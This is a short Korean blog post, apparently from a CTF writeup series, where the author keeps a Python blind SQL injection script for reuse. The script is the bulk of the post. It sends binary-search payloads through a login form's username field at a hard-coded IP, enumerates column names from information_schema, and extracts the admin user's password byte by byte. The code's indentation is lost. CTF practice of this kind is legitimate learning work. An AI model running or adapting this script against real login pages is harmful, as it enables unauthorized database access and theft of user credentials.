평소 sqli 문제는 잘 못 풀었었는데 이제 어느정도 감 잡은 것 같다.
blind sqli 코드 재활용을 위해 남긴다
from requests import *
URL = 'http://54.180.124.188:8010/'
for k in range(1):
print('*'*10)
s = []
for j in range(40):
# print('asdf')
start = 0
end = 255
for i in range(30):
bs = (start + end) // 2
# print(bs, start, end)
password = '12345678'
username = f"' or (select case when ord(substr(s.column_name, {j+1}, 1)) >= {bs} then 1 else 0 end from information_schema.columns as s where s.table_schema='freeboard' and table_name='post' limit {k+1}, 1) -- "
username = f"' or (select case when ord(substr(s.password,{j+1},1)) >= {bs} then 1 else 0 end from user as s where s.username='admin' limit {k},1) -- "
# username = f"' or (select case when ord(substr(database(), {j+1}, 1)) >= {bs} then 1 else 0 end) -- "
r = post(f'{URL}login.php', data={
'username': username,
'password': password
})
if 'success' in r.text:
start = bs
else:
end = bs
if start == end-1:
username = f"' or (select case when ord(substr(s.password,{j+1},1)) = {start} then 1 else 0 end from user as s where s.username='admin' limit {k},1) -- "
# username = f"' or (select case when ord(substr(database(), {j+1}, 1)) >= {bs} then 1 else 0 end) -- "
r = post(f'{URL}login.php', data={
'username': username,
'password': password
})
if 'success' in r.text:
s.append(start)
else:
s.append(end)
break
if s[-1] <= 1:
break
print(bytes(s))'CTF Writeup' 카테고리의 다른 글
| seeds - python bytes, int seed trick (0) | 2023.11.27 |
|---|---|
| babysrc - CSP default-src, unsafe-inline bypass (1) | 2023.11.27 |
| hdrive - tar symbolic link attack (1) | 2023.11.27 |
| safe-compiler / C jail Trick (1) | 2023.11.27 |
| 2023 WACON Qual - Adult Artist (2) | 2023.09.03 |